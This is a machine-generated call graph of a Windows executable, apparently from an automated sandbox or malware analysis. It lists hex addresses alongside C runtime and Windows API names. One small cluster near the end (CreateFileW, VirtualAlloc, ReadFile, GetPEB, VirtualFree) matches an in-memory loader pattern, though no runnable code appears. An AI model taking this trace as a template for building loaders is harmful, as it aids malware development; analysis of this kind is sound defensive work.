3aea41 93619->93622 93755 3a7c0e 47 API calls __getptd_noexit 93621->93755 93738 3aea9c 93622->93738 93624 3ae9f3 ___lock_fhandle 93624->93583 93626 3aea47 93756 3aea73 LeaveCriticalSection __unlock_fhandle 93626->93756 93628->93573 93629->93577 93631 3aaf6d ___lock_fhandle 93630->93631 93632 3aaf8d 93631->93632 93633 3aaf75 93631->93633 93634 3ab022 93632->93634 93639 3aafbf 93632->93639 93728 3a7bda 47 API calls __getptd_noexit 93633->93728 93733 3a7bda 47 API calls __getptd_noexit 93634->93733 93637 3aaf7a 93729 3a7c0e 47 API calls __getptd_noexit 93637->93729 93638 3ab027 93734 3a7c0e 47 API calls __getptd_noexit 93638->93734 93655 3aa8ed 93639->93655 93643 3aaf82 ___lock_fhandle 93643->93593 93644 3ab02f 93735 3a6e10 8 API calls __wtof_l 93644->93735 93645 3aafc5 93647 3aafeb 93645->93647 93648 3aafd8 93645->93648 93730 3a7c0e 47 API calls __getptd_noexit 93647->93730 93664 3ab043 93648->93664 93651 3aafe4 93732 3ab01a LeaveCriticalSection __unlock_fhandle 93651->93732 93652 3aaff0 93731 3a7bda 47 API calls __getptd_noexit 93652->93731 93656 3aa8f9 ___lock_fhandle 93655->93656 93657 3aa946 EnterCriticalSection 93656->93657 93658 3a7cf4 __lock 47 API calls 93656->93658 93660 3aa96c ___lock_fhandle 93657->93660 93659 3aa91d 93658->93659 93661 3aa93a 93659->93661 93662 3aa928 InitializeCriticalSectionAndSpinCount 93659->93662 93660->93645 93663 3aa970 ___lock_fhandle LeaveCriticalSection 93661->93663 93662->93661 93663->93657 93665 3ab050 __ftell_nolock 93664->93665 93666 3ab0ac 93665->93666 93667 3ab08d 93665->93667 93698 3ab082 93665->93698 93672 3ab105 93666->93672 93673 3ab0e9 93666->93673 93669 3a7bda __lseeki64 47 API calls 93667->93669 93668 3aa70c __wtof_l 6 API calls 93670 3ab86b 93668->93670 93671 3ab092 93669->93671 93670->93651 93674 3a7c0e __wtof_l 47 API calls 93671->93674 93675 3ab11c 93672->93675 93679 3af82f __lseeki64_nolock 49 API calls 93672->93679 93676 3a7bda __lseeki64 47 API calls 93673->93676 93678 3ab099 93674->93678 93680 3b3bf2 __flswbuf 47 API calls 93675->93680 93677 3ab0ee 93676->93677 93681 3a7c0e __wtof_l 47 API calls 93677->93681 93682 3a6e10 __wtof_l 8 API calls 93678->93682 93679->93675 93683 3ab12a 93680->93683 93684 3ab0f5 93681->93684 93682->93698 93685 3ab44b 93683->93685 93691 3a7a0d ____lc_codepage_func 47 API calls 93683->93691 93688 3a6e10 __wtof_l 8 API calls 93684->93688 93686 3ab7b8 WriteFile 93685->93686 93687 3ab463 93685->93687 93690 3ab7e1 GetLastError 93686->93690 93700 3ab410 93686->93700 93689 3ab55a 93687->93689 93697 3ab479 93687->93697 93688->93698 93702 3ab663 93689->93702 93705 3ab565 93689->93705 93690->93700 93692 3ab150 GetConsoleMode 93691->93692 93692->93685 93694 3ab189 93692->93694 93693 3ab81b 93693->93698 93699 3a7c0e __wtof_l 47 API calls 93693->93699 93694->93685 93695 3ab199 GetConsoleCP 93694->93695 93695->93700 93716 3ab1c2 93695->93716 93696 3ab4e9 WriteFile 93696->93690 93701 3ab526 93696->93701 93697->93693 93697->93696 93698->93668 93703 3ab843 93699->93703 93700->93693 93700->93698 93704 3ab7f7 93700->93704 93701->93697 93701->93700 93722 3ab555 93701->93722 93702->93693 93707 3ab6d8 WideCharToMultiByte 93702->93707 93708 3a7bda __lseeki64 47 API calls 93703->93708 93709 3ab7fe 93704->93709 93710 3ab812 93704->93710 93705->93693 93706 3ab5de WriteFile 93705->93706 93706->93690 93711 3ab62d 93706->93711 93707->93690 93721 3ab71f 93707->93721 93708->93698 93713 3a7c0e __wtof_l 47 API calls 93709->93713 93712 3a7bed __dosmaperr 47 API calls 93710->93712 93711->93700 93711->93705 93711->93722 93712->93698 93715 3ab803 93713->93715 93714 3ab727 WriteFile 93717 3ab77a GetLastError 93714->93717 93714->93721 93718 3a7bda __lseeki64 47 API calls 93715->93718 93716->93700 93719 3a1688 __chsize_nolock 57 API calls 93716->93719 93723 3ab28f WideCharToMultiByte 93716->93723 93724 3b40f7 59 API calls __chsize_nolock 93716->93724 93726 3ab2f6 93716->93726 93717->93721 93718->93698 93719->93716 93720 3b5884 WriteConsoleW CreateFileW __chsize_nolock 93720->93726 93721->93700 93721->93702 93721->93714 93721->93722 93722->93700 93723->93700 93725 3ab2ca WriteFile 93723->93725 93724->93716 93725->93690 93725->93726 93726->93690 93726->93700 93726->93716 93726->93720 93727 3ab321 WriteFile 93726->93727 93727->93690 93727->93726 93728->93637 93729->93643 93730->93652 93731->93651 93732->93643 93733->93638 93734->93644 93735->93643 93736->93602 93737->93604 93760 3aaba4 93738->93760 93740 3aeb00 93773 3aab1e 48 API calls 2 library calls 93740->93773 93742 3aeaaa 93742->93740 93743 3aeade 93742->93743 93745 3aaba4 __lseeki64_nolock 47 API calls 93742->93745 93743->93740 93746 3aaba4 __lseeki64_nolock 47 API calls 93743->93746 93744 3aeb08 93747 3aeb2a 93744->93747 93774 3a7bed 47 API calls 3 library calls 93744->93774 93748 3aead5 93745->93748 93749 3aeaea CloseHandle 93746->93749 93747->93626 93751 3aaba4 __lseeki64_nolock 47 API calls 93748->93751 93749->93740 93752 3aeaf6 GetLastError 93749->93752 93751->93743 93752->93740 93753->93611 93754->93624 93755->93626 93756->93624 93757->93614 93758->93618 93759->93624 93761 3aabaf 93760->93761 93762 3aabc4 93760->93762 93763 3a7bda __lseeki64 47 API calls 93761->93763 93765 3a7bda __lseeki64 47 API calls 93762->93765 93767 3aabe9 93762->93767 93764 3aabb4 93763->93764 93766 3a7c0e __wtof_l 47 API calls 93764->93766 93768 3aabf3 93765->93768 93770 3aabbc 93766->93770 93767->93742 93769 3a7c0e __wtof_l 47 API calls 93768->93769 93771 3aabfb 93769->93771 93770->93742 93772 3a6e10 __wtof_l 8 API calls 93771->93772 93772->93770 93773->93744 93774->93747 93775->93204 93776->93213 93777->93213 93778->93214 93779->93227 93780->93229 93781->93226 93782->93234 93783->93240 93784->93255 93785->93253 93787 3af8a0 __ftell_nolock 93786->93787 93788 3840b4 GetLongPathNameW 93787->93788 93789 386a63 48 API calls 93788->93789 93790 3840dc 93789->93790 93791 3849a0 93790->93791 93792 38d7f7 48 API calls 93791->93792 93793 3849b2 93792->93793 93794 38660f 49 API calls 93793->93794 93795 3849bd 93794->93795 93796 3849c8 93795->93796 93797 3f2e35 93795->93797 93799 3864cf 48 API calls 93796->93799 93802 3f2e4f 93797->93802 93844 39d35e 60 API calls 93797->93844 93800 3849d4 93799->93800 93838 3828a6 93800->93838 93803 3849e7 Mailbox 93803->93068 93805 3841a9 136 API calls 93804->93805 93806 38415e 93805->93806 93807 3f3489 93806->93807 93809 3841a9 136 API calls 93806->93809 93808 3cc396 122 API calls 93807->93808 93810 3f349e 93808->93810 93811 384172 93809->93811 93812 3f34bf 93810->93812 93813 3f34a2 93810->93813 93811->93807 93814 38417a 93811->93814 93816 39f4ea 48 API calls 93812->93816 93815 384252 84 API calls 93813->93815 93817 3f34aa 93814->93817 93818 384186 93814->93818 93815->93817 93831 3f3504 Mailbox 93816->93831 93933 3c6b49 87 API calls _wprintf 93817->93933 93845 38c833 93818->93845 93821 3f34b8 93821->93812 93823 3f36b4 93824 3a1c9d _free 47 API calls 93823->93824 93825 3f36bc 93824->93825 93826 384252 84 API calls 93825->93826 93832 3f36c5 93826->93832 93830 3a1c9d _free 47 API calls 93830->93832 93831->93823 93831->93832 93835 38ce19 48 API calls 93831->93835 93934 3c2551 48 API calls _memcpy_s 93831->93934 93935 3c2472 60 API calls 2 library calls 93831->93935 93936 3c9c12 48 API calls 93831->93936 93937 38ba85 48 API calls _memcpy_s 93831->93937 93938 384dd9 48 API calls 93831->93938 93832->93830 93834 384252 84 API calls 93832->93834 93939 3c25b5 86 API calls 4 library calls 93832->93939 93834->93832 93835->93831 93839 3828b8 93838->93839 93843 3828d7 _memcpy_s 93838->93843 93841 39f4ea 48 API calls 93839->93841 93840 39f4ea 48 API calls 93842 3828ee 93840->93842 93841->93843 93842->93803 93843->93840 93844->93797 93846 38c843 __ftell_nolock 93845->93846 93847 38c860 93846->93847 93848 3f3095 93846->93848 93945 3848ba 49 API calls 93847->93945 93964 3c25b5 86 API calls 4 library calls 93848->93964 93851 3f30a8 93965 3c25b5 86 API calls 4 library calls 93851->93965 93852 38c882 93946 384550 56 API calls 93852->93946 93854 38c897 93854->93851 93856 38c89f 93854->93856 93858 38d7f7 48 API calls 93856->93858 93857 3f30c4 93860 38c90c 93857->93860 93859 38c8ab 93858->93859 93947 39e968 49 API calls __ftell_nolock 93859->93947 93862 38c91a 93860->93862 93863 3f30d7 93860->93863 93950 3a1dfc 93862->93950 93866 384907 CloseHandle 93863->93866 93864 38c8b7 93867 38d7f7 48 API calls 93864->93867 93868 3f30e3 93866->93868 93869 38c8c3 93867->93869 93870 3841a9 136 API calls 93868->93870 93871 38660f 49 API calls 93869->93871 93872 3f310d 93870->93872 93873 38c8d1 93871->93873 93876 3f3136 93872->93876 93880 3cc396 122 API calls 93872->93880 93948 39eb66 SetFilePointerEx ReadFile 93873->93948 93875 38c943 _wcscat _wcscpy 93879 38c96d SetCurrentDirectoryW 93875->93879 93966 3c25b5 86 API calls 4 library calls 93876->93966 93877 38c8fd 93949 3846ce SetFilePointerEx SetFilePointerEx 93877->93949 93883 39f4ea 48 API calls 93879->93883 93884 3f3129 93880->93884 93882 3f314d 93917 38cad1 Mailbox 93882->93917 93885 38c988 93883->93885 93886 3f3152 93884->93886 93887 3f3131 93884->93887 93890 3847b7 48 API calls 93885->93890 93889 384252 84 API calls 93886->93889 93888 384252 84 API calls 93887->93888 93888->93876 93891 3f3157 93889->93891 93920 38c993 Mailbox __NMSG_WRITE 93890->93920 93892 39f4ea 48 API calls 93891->93892 93899 3f3194 93892->93899 93893 38ca9d 93960 384907 93893->93960 93897 383d98 93897->92942 93897->92965 93898 38caa9 SetCurrentDirectoryW 93898->93917 93967 38ba85 48 API calls _memcpy_s 93899->93967 93903 3f33ce 93973 3c9b72 48 API calls 93903->93973 93904 3f3467 93977 3c25b5 86 API calls 4 library calls 93904->93977 93908 3f3480 93908->93893 93909 3f33f0 93974 3e29e8 48 API calls _memcpy_s 93909->93974 93911 3f33fd 93913 3a1c9d _free 47 API calls 93911->93913 93912 3f345f 93976 3c240b 48 API calls 3 library calls 93912->93976 93913->93917 93915 38ce19 48 API calls 93915->93920 93940 3848dd 93917->93940 93920->93893 93920->93904 93920->93912 93920->93915 93953 38b337 56 API calls _wcscpy 93920->93953 93954 39c258 GetStringTypeW 93920->93954 93955 38cb93 59 API calls __wcsnicmp 93920->93955 93956 38cb5a GetStringTypeW __NMSG_WRITE 93920->93956 93957 3a16d0 GetStringTypeW __wtof_l 93920->93957 93958 38cc24 162 API calls 3 library calls 93920->93958 93959 39c682 48 API calls 93920->93959 93921 3f31dd Mailbox 93921->93903 93925 38ce19 48 API calls 93921->93925 93928 3f3420 93921->93928 93968 3c2551 48 API calls _memcpy_s 93921->93968 93969 3c2472 60 API calls 2 library calls 93921->93969 93970 3c9c12 48 API calls 93921->93970 93971 38ba85 48 API calls _memcpy_s 93921->93971 93972 39c682 48 API calls 93921->93972 93925->93921 93975 3c25b5 86 API calls 4 library calls 93928->93975 93930 3f3439 93931 3a1c9d _free 47 API calls 93930->93931 93932 3f344c 93931->93932 93932->93917 93933->93821 93934->93831 93935->93831 93936->93831 93937->93831 93938->93831 93939->93832 93941 384907 CloseHandle 93940->93941 93942 3848e5 Mailbox 93941->93942 93943 384907 CloseHandle 93942->93943 93944 3848fc 93943->93944 93944->93897 93945->93852 93946->93854 93947->93864 93948->93877 93949->93860 93978 3a1e46 93950->93978 93953->93920 93954->93920 93955->93920 93956->93920 93957->93920 93958->93920 93959->93920 93961 384920 93960->93961 93962 384911 93960->93962 93961->93962 93963 384925 CloseHandle 93961->93963 93962->93898 93963->93962 93964->93851 93965->93857 93966->93882 93967->93921 93968->93921 93969->93921 93970->93921 93971->93921 93972->93921 93973->93909 93974->93911 93975->93930 93976->93904 93977->93908 93980 3a1e61 93978->93980 93982 3a1e55 93978->93982 94002 3a7c0e 47 API calls __getptd_noexit 93980->94002 93981 3a2019 93984 3a1e41 93981->93984 94003 3a6e10 8 API calls __wtof_l 93981->94003 93982->93980 93990 3a1ed4 93982->93990 93997 3a9d6b 47 API calls __wtof_l 93982->93997 93984->93875 93986 3a1fa0 93986->93980 93986->93984 93989 3a1fb0 93986->93989 93987 3a1f5f 93987->93980 93988 3a1f7b 93987->93988 93999 3a9d6b 47 API calls __wtof_l 93987->93999 93988->93980 93988->93984 93993 3a1f91 93988->93993 94001 3a9d6b 47 API calls __wtof_l 93989->94001 93990->93980 93996 3a1f41 93990->93996 93998 3a9d6b 47 API calls __wtof_l 93990->93998 94000 3a9d6b 47 API calls __wtof_l 93993->94000 93996->93986 93996->93987 93997->93990 93998->93996 93999->93988 94000->93984 94001->93984 94002->93981 94003->93984 94005 384c8b 94004->94005 94009 384d94 94004->94009 94006 39f4ea 48 API calls 94005->94006 94005->94009 94007 384cb2 94006->94007 94008 39f4ea 48 API calls 94007->94008 94014 384d22 94008->94014 94009->93074 94014->94009 94017 38b470 94014->94017 94045 384dd9 48 API calls 94014->94045 94046 3c9af1 48 API calls 94014->94046 94047 38ba85 48 API calls _memcpy_s 94014->94047 94015->93076 94016->93078 94048 386b0f 94017->94048 94019 38b69b 94055 38ba85 48 API calls _memcpy_s 94019->94055 94021 38b6b5 Mailbox 94021->94014 94024 3f397b 94059 3c26bc 88 API calls 4 library calls 94024->94059 94025 38ba85 48 API calls 94036 38b495 94025->94036 94028 38b9e4 94061 3c26bc 88 API calls 4 library calls 94028->94061 94029 3f3973 94029->94021 94032 38bcce 48 API calls 94032->94036 94033 3f3989 94060 38ba85 48 API calls _memcpy_s 94033->94060 94035 3f3909 94038 386b4a 48 API calls 94035->94038 94036->94019 94036->94024 94036->94025 94036->94028 94036->94032 94036->94035 94037 38bb85 48 API calls 94036->94037 94041 38bdfa 48 API calls 94036->94041 94044 3f3939 _memcpy_s 94036->94044 94053 38c413 59 API calls 94036->94053 94054 38bc74 48 API calls 94036->94054 94056 38c6a5 49 API calls 94036->94056 94057 38c799 48 API calls _memcpy_s 94036->94057 94037->94036 94040 3f3914 94038->94040 94043 39f4ea 48 API calls 94040->94043 94042 38b66c CharUpperBuffW 94041->94042 94042->94036 94043->94044 94058 3c26bc 88 API calls 4 library calls 94044->94058 94045->94014 94046->94014 94047->94014 94049 39f4ea 48 API calls 94048->94049 94050 386b34 94049->94050 94051 386b4a 48 API calls 94050->94051 94052 386b43 94051->94052 94052->94036 94053->94036 94054->94036 94055->94021 94056->94036 94057->94036 94058->94029 94059->94033 94060->94029 94061->94029 94063 3f418d EnumResourceNamesW 94062->94063 94064 38403c LoadImageW 94062->94064 94065 383ee1 RegisterClassExW 94063->94065 94064->94065 94066 383f53 7 API calls 94065->94066 94066->93093 94068 3f3c33 94067->94068 94069 384c44 94067->94069 94068->94069 94070 3f3c3c DestroyIcon 94068->94070 94069->93099 94093 3c5819 61 API calls _W_store_winword 94069->94093 94070->94069 94072 3851cb 94071->94072 94073 3852a2 Mailbox 94071->94073 94074 386b0f 48 API calls 94072->94074 94073->93104 94075 3851d9 94074->94075 94076 3f3ca1 LoadStringW 94075->94076 94077 3851e6 94075->94077 94080 3f3cbb 94076->94080 94078 386a63 48 API calls 94077->94078 94079 3851fb 94078->94079 94079->94080 94081 38520c 94079->94081 94082 38510d 48 API calls 94080->94082 94083 385216 94081->94083 94084 3852a7 94081->94084 94087 3f3cc5 94082->94087 94088 38518c 48 API calls 94087->94088 94093->93099 94095 38ef1d 94094->94095 94096 38ef2f 94094->94096 94095->93165 94304 3ccc5c 86 API calls 4 library calls 94096->94304 94098 3f86f9 94098->94098 94100 38f130 94099->94100 94102 38fe30 335 API calls 94100->94102 94104 38f199 94100->94104 94101 38f3dd 94106 3f87c8 94101->94106 94116 38f3f2 94101->94116 94147 38f431 Mailbox 94101->94147 94105 3f8728 94102->94105 94103 38f595 94110 38d7f7 48 API calls 94103->94110 94103->94147 94104->94101 94104->94103 94112 38d7f7 48 API calls 94104->94112 94148 38f229 94104->94148 94105->94104 94306 3ccc5c 86 API calls 4 library calls 94105->94306 94309 3ccc5c 86 API calls 4 library calls 94106->94309 94107 38fe30 335 API calls 94107->94147 94111 3f87a3 94110->94111 94308 3a0f0a 52 API calls __cinit 94111->94308 94113 3f8772 94112->94113 94307 3a0f0a 52 API calls __cinit 94113->94307 94114 3ccc5c 86 API calls 94114->94147 94142 38f418 94116->94142 94310 3c9af1 48 API calls 94116->94310 94117 3f8b1b 94127 3f8bcf 94117->94127 94128 3f8b2c 94117->94128 94119 38d6e9 55 API calls 94119->94147 94121 38f770 94123 3f8a45 94121->94123 94141 38f77a 94121->94141 94122 3f8b7e 94319 3de40a 335 API calls Mailbox 94122->94319 94316 39c1af 48 API calls 94123->94316 94124 3f8c53 94324 3ccc5c 86 API calls 4 library calls 94124->94324 94125 3f8810 94311 3deef8 335 API calls 94125->94311 94126 38fe30 335 API calls 94143 38f6aa 94126->94143 94321 3ccc5c 86 API calls 4 library calls 94127->94321 94318 3df5ee 335 API calls 94128->94318 94129 3f8beb 94322 3dbdbd 335 API calls Mailbox 94129->94322 94136 391b90 48 API calls 94136->94147 94139 391b90 48 API calls 94139->94147 94140 3f8c00 94163 38f537 Mailbox 94140->94163 94323 3ccc5c 86 API calls 4 library calls 94140->94323 94141->94139 94142->94117 94142->94143 94142->94147 94143->94121 94143->94126 94144 38fce0 94143->94144 94143->94147 94143->94163 94144->94163 94320 3ccc5c 86 API calls 4 library calls 94144->94320 94146 3f8823 94146->94142 94151 3f884b 94146->94151 94147->94107 94147->94114 94147->94119 94147->94122 94147->94124 94147->94129 94147->94136 94147->94144 94147->94163 94305 38dd47 48 API calls _memcpy_s 94147->94305 94317 3b97ed InterlockedDecrement 94147->94317 94325 39c1af 48 API calls 94147->94325 94148->94101 94148->94103 94148->94142 94148->94147 94312 3dccdc 48 API calls 94151->94312 94163->93165 94165 39479f 94164->94165 94166 394637 94164->94166 94169 38ce19 48 API calls 94165->94169 94167 3f6e05 94166->94167 94168 394643 94166->94168 94380 3de822 94167->94380 94379 394300 335 API calls _memcpy_s 94168->94379 94176 3946e4 Mailbox 94169->94176 94172 3f6e11 94173 394739 Mailbox 94172->94173 94420 3ccc5c 86 API calls 4 library calls 94172->94420 94173->93165 94175 394659 94175->94172 94175->94173 94175->94176 94179 384252 84 API calls 94176->94179 94326 3cfa0c 94176->94326 94367 3d6ff0 94176->94367 94376 3c6524 94176->94376 94179->94173 94182 39e253 94181->94182 94183 3fdf42 94181->94183 94182->93165 94184 3fdf77 94183->94184 94185 3fdf59 TranslateAcceleratorW 94183->94185 94185->94182 94187 39dca3 94186->94187 94189 39dc71 94186->94189 94187->93165 94188 39dc96 IsDialogMessageW 94188->94187 94188->94189 94189->94187 94189->94188 94190 3fdd1d GetClassLongW 94189->94190 94190->94188 94190->94189 94191->93165 94534 38bd30 94192->94534 94194 393267 94195 3932f8 94194->94195 94196 3f907a 94194->94196 94260 393628 94194->94260 94546 39c36b 86 API calls 94195->94546 94552 3ccc5c 86 API calls 4 library calls 94196->94552 94200 3f94df 94200->94260 94569 3ccc5c 86 API calls 4 library calls 94200->94569 94202 39c3c3 48 API calls 94243 3934eb _memcpy_s Mailbox 94202->94243 94203 393313 94203->94200 94203->94243 94203->94260 94539 382b7a 94203->94539 94207 3f926d 94561 3ccc5c 86 API calls 4 library calls 94207->94561 94208 3f909a 94211 38d645 53 API calls 94208->94211 94250 3f91fa 94208->94250 94210 38fe30 335 API calls 94212 3f9407 94210->94212 94213 3f910c 94211->94213 94223 38d6e9 55 API calls 94212->94223 94212->94260 94217 3f9114 94213->94217 94218 3f9220 94213->94218 94228 3f9438 94223->94228 94566 3ccc5c 86 API calls 4 library calls 94228->94566 94230 38fe30 335 API calls 94230->94243 94236 39351f 94251 386eed 48 API calls 94236->94251 94252 393540 94236->94252 94243->94202 94243->94207 94243->94208 94243->94228 94243->94230 94243->94236 94247 39f4ea 48 API calls 94243->94247 94253 3f9394 94243->94253 94256 3f93c5 94243->94256 94243->94260 94548 38d9a0 53 API calls __cinit 94243->94548 94549 38d8c0 53 API calls 94243->94549 94550 39c2d6 48 API calls _memcpy_s 94243->94550 94562 3dcda2 82 API calls Mailbox 94243->94562 94563 3c80e3 53 API calls 94243->94563 94564 38d764 55 API calls 94243->94564 94565 38dcae 50 API calls Mailbox 94243->94565 94247->94243 94557 3ccc5c 86 API calls 4 library calls 94250->94557 94251->94252 94257 3f94b0 94252->94257 94259 393585 94252->94259 94252->94260 94255 39f4ea 48 API calls 94253->94255 94255->94256 94256->94210 94259->94200 94259->94260 94263 393635 Mailbox 94260->94263 94551 3ccc5c 86 API calls 4 library calls 94260->94551 94263->93165 94264->93120 94265->93112 94266->93117 94267->93165 94268->93165 94269->93161 94270->93161 94271->93161 94273 38fe50 94272->94273 94298 38fe7e 94272->94298 94274 39f4ea 48 API calls 94273->94274 94274->94298 94275 39146e 94276 386eed 48 API calls 94275->94276 94296 38ffe1 94276->94296 94277 38d7f7 48 API calls 94277->94298 94278 390509 94576 3ccc5c 86 API calls 4 library calls 94278->94576 94280 39f4ea 48 API calls 94280->94298 94282 386eed 48 API calls 94282->94298 94284 391473 94575 3ccc5c 86 API calls 4 library calls 94284->94575 94285 3fa246 94289 386eed 48 API calls 94285->94289 94286 3fa922 94286->93165 94289->94296 94290 3fa873 94290->93165 94291 3fa30e 94291->94296 94573 3b97ed InterlockedDecrement 94291->94573 94292 3a0f0a 52 API calls __cinit 94292->94298 94294 3b97ed InterlockedDecrement 94294->94298 94295 3fa973 94577 3ccc5c 86 API calls 4 library calls 94295->94577 94296->93165 94298->94275 94298->94277 94298->94278 94298->94280 94298->94282 94298->94284 94298->94285 94298->94291 94298->94292 94298->94294 94298->94295 94298->94296 94300 3915b5 94298->94300 94571 391820 335 API calls 2 library calls 94298->94571 94572 391d10 59 API calls Mailbox 94298->94572 94299 3fa982 94574 3ccc5c 86 API calls 4 library calls 94300->94574 94301->93161 94302->93161 94303->93161 94304->94098 94305->94147 94306->94104 94307->94148 94308->94147 94309->94163 94310->94125 94311->94146 94316->94147 94317->94147 94318->94147 94319->94144 94320->94163 94321->94163 94322->94140 94323->94163 94324->94163 94325->94147 94327 3cfa1c __ftell_nolock 94326->94327 94328 3cfa44 94327->94328 94482 38d286 48 API calls 94327->94482 94330 38936c 81 API calls 94328->94330 94331 3cfa5e 94330->94331 94332 3cfb68 94331->94332 94333 3cfa80 94331->94333 94343 3cfb92 94331->94343 94334 3841a9 136 API calls 94332->94334 94335 38936c 81 API calls 94333->94335 94343->94173 94368 38936c 81 API calls 94367->94368 94369 3d702a 94368->94369 94370 38b470 91 API calls 94369->94370 94371 3d703a 94370->94371 94372 3d705f 94371->94372 94373 38fe30 335 API calls 94371->94373 94375 3d7063 94372->94375 94521 38cdb9 48 API calls 94372->94521 94373->94372 94375->94173 94522 3c6ca9 GetFileAttributesW 94376->94522 94379->94175 94381 3de84e 94380->94381 94382 3de868 94380->94382 94526 3ccc5c 86 API calls 4 library calls 94381->94526 94527 3dccdc 48 API calls 94382->94527 94385 3de871 94386 38fe30 334 API calls 94385->94386 94387 3de8cf 94386->94387 94388 3de96a 94387->94388 94390 3de916 94387->94390 94419 3de860 Mailbox 94387->94419 94389 3de978 94388->94389 94392 3de9c7 94388->94392 94528 3c9b72 48 API calls 94390->94528 94392->94419 94394 3de949 94419->94172 94420->94173 94482->94328 94521->94375 94523 3c6529 94522->94523 94524 3c6cc4 FindFirstFileW 94522->94524 94523->94173 94524->94523 94525 3c6cd9 FindClose 94524->94525 94525->94523 94526->94419 94527->94385 94528->94394 94535 38bd3f 94534->94535 94538 38bd5a 94534->94538 94536 38bdfa 48 API calls 94535->94536 94537 38bd47 CharUpperBuffW 94536->94537 94537->94538 94538->94194 94540 382b8b 94539->94540 94541 3f436a 94539->94541 94542 39f4ea 48 API calls 94540->94542 94543 382b92 94542->94543 94546->94203 94548->94243 94549->94243 94550->94243 94551->94263 94552->94203 94557->94260 94561->94260 94562->94243 94563->94243 94564->94243 94565->94243 94566->94260 94569->94260 94571->94298 94572->94298 94573->94296 94574->94296 94575->94290 94576->94286 94577->94299 94578 38f030 94581 393b70 94578->94581 94580 38f03c 94582 393bc8 94581->94582 94603 3942a5 94581->94603 94583 393bef 94582->94583 94584 3f6fd1 94582->94584 94587 3f6f7e 94582->94587 94594 3f6f9b 94582->94594 94585 39f4ea 48 API calls 94583->94585 94661 3dceca 335 API calls Mailbox 94584->94661 94586 393c18 94585->94586 94589 39f4ea 48 API calls 94586->94589 94587->94583 94590 3f6f87 94587->94590 94628 393c2c _memcpy_s __NMSG_WRITE 94589->94628 94658 3dd552 335 API calls Mailbox 94590->94658 94591 3f6fbe 94660 3ccc5c 86 API calls 4 library calls 94591->94660 94594->94591 94659 3dda0e 335 API calls 2 library calls 94594->94659 94595 3942f2 94680 3ccc5c 86 API calls 4 library calls 94595->94680 94598 3f73b0 94598->94580 94599 3f737a 94679 3ccc5c 86 API calls 4 library calls 94599->94679 94600 3f7297 94669 3ccc5c 86 API calls 4 library calls 94600->94669 94673 3ccc5c 86 API calls 4 library calls 94603->94673 94605 3940df 94670 3ccc5c 86 API calls 4 library calls 94605->94670 94607 3f707e 94662 3ccc5c 86 API calls 4 library calls 94607->94662 94609 39dce0 53 API calls 94609->94628 94610 38d6e9 55 API calls 94610->94628 94613 38d645 53 API calls 94613->94628 94616 3f72d2 94671 3ccc5c 86 API calls 4 library calls 94616->94671 94618 3f7350 94677 3ccc5c 86 API calls 4 library calls 94618->94677 94620 38fe30 335 API calls 94620->94628 94621 3f7363 94678 3ccc5c 86 API calls 4 library calls 94621->94678 94623 3f72e9 94672 3ccc5c 86 API calls 4 library calls 94623->94672 94626 386a63 48 API calls 94626->94628 94628->94595 94628->94599 94628->94600 94628->94603 94628->94605 94628->94607 94628->94609 94628->94610 94628->94613 94628->94616 94628->94618 94628->94620 94628->94621 94628->94623 94628->94626 94629 39f4ea 48 API calls 94628->94629 94630 39c050 48 API calls 94628->94630 94631 3f714c 94628->94631 94632 38d286 48 API calls 94628->94632 94634 3f733f 94628->94634 94637 386eed 48 API calls 94628->94637 94639 393f2b 94628->94639 94643 39ee75 48 API calls 94628->94643 94651 3f71e1 94628->94651 94653 38d9a0 53 API calls __cinit 94628->94653 94654 38d83d 53 API calls 94628->94654 94655 38cdb9 48 API calls 94628->94655 94656 39c15c 48 API calls 94628->94656 94657 39becb 335 API calls 94628->94657 94663 38dcae 50 API calls Mailbox 94628->94663 94664 3dccdc 48 API calls 94628->94664 94665 3ca1eb 50 API calls 94628->94665 94629->94628 94630->94628 94666 3dccdc 48 API calls 94631->94666 94632->94628 94676 3ccc5c 86 API calls 4 library calls 94634->94676 94635 3f715f 94640 3f71a1 94635->94640 94667 3dccdc 48 API calls 94635->94667 94637->94628 94639->94580 94668 39c15c 48 API calls 94640->94668 94643->94628 94645 3f71ce 94647 39c050 48 API calls 94645->94647 94649 3f71d6 94647->94649 94648 3f71ab 94648->94603 94648->94645 94650 3f7313 94649->94650 94649->94651 94674 3ccc5c 86 API calls 4 library calls 94650->94674 94651->94639 94675 3ccc5c 86 API calls 4 library calls 94651->94675 94653->94628 94654->94628 94655->94628 94656->94628 94657->94628 94658->94639 94659->94591 94660->94584 94661->94628 94662->94639 94663->94628 94664->94628 94665->94628 94666->94635 94667->94635 94668->94648 94669->94605 94670->94639 94671->94623 94672->94639 94673->94639 94674->94639 94675->94639 94676->94639 94677->94639 94678->94639 94679->94639 94680->94598 94681 19fc953 94682 19fc95a 94681->94682 94683 19fc9f8 94682->94683 94684 19fc962 94682->94684 94701 19fd2a8 9 API calls 94683->94701 94688 19fc608 94684->94688 94687 19fc9df 94702 19f9ff8 94688->94702 94691 19fc6d8 CreateFileW 94693 19fc6e5 94691->94693 94698 19fc6a7 94691->94698 94692 19fc701 VirtualAlloc 94692->94693 94694 19fc722 ReadFile 94692->94694 94695 19fc8f4 VirtualFree 94693->94695 94696 19fc902 94693->94696 94694->94693 94697 19fc740 VirtualAlloc 94694->94697 94695->94696 94696->94687 94697->94693 94697->94698 94698->94692 94698->94693 94699 19fc808 CloseHandle 94698->94699 94700 19fc818 VirtualFree 94698->94700 94706 19fd518 GetPEB 94698->94706 94699->94698 94700->94698 94701->94687 94703 19fa029 94702->94703 94708 19fd4b8 GetPEB 94703->94708 94705 19fa683 94705->94698 94707 19fd542 94706->94707 94707->94691 94709 19fd4e2 94708->94709 94709->94705 94710 3f9bec 94744 390ae0 _memcpy_s Mailbox 94710->94744 94714 39f4ea 48 API calls 94736 38fec8 94714->94736 94716 39146e 94721 386eed 48 API calls 94716->94721 94718 390509 94805 3ccc5c 86 API calls 4 library calls 94718->94805 94720 391473 94804 3ccc5c 86 API calls 4 library calls 94720->94804 94739 38ffe1 Mailbox 94721->94739 94722 3fa246 94728 386eed 48 API calls 94722->94728 94724 3fa922 94727 386eed 48 API calls 94727->94736 94728->94739 94729 3b97ed InterlockedDecrement 94729->94736 94730 3fa873 94731 3fa30e 94731->94739 94800 3b97ed InterlockedDecrement 94731->94800 94732 38d7f7 48 API calls 94732->94736 94733 38ce19 48 API calls 94733->94744 94735 3a0f0a 52 API calls __cinit 94735->94736 94736->94714 94736->94716 94736->94718 94736->94720 94736->94722 94736->94727 94736->94729 94736->94731 94736->94732 94736->94735 94737 3fa973 94736->94737 94736->94739 94741 3915b5 94736->94741 94797 391820 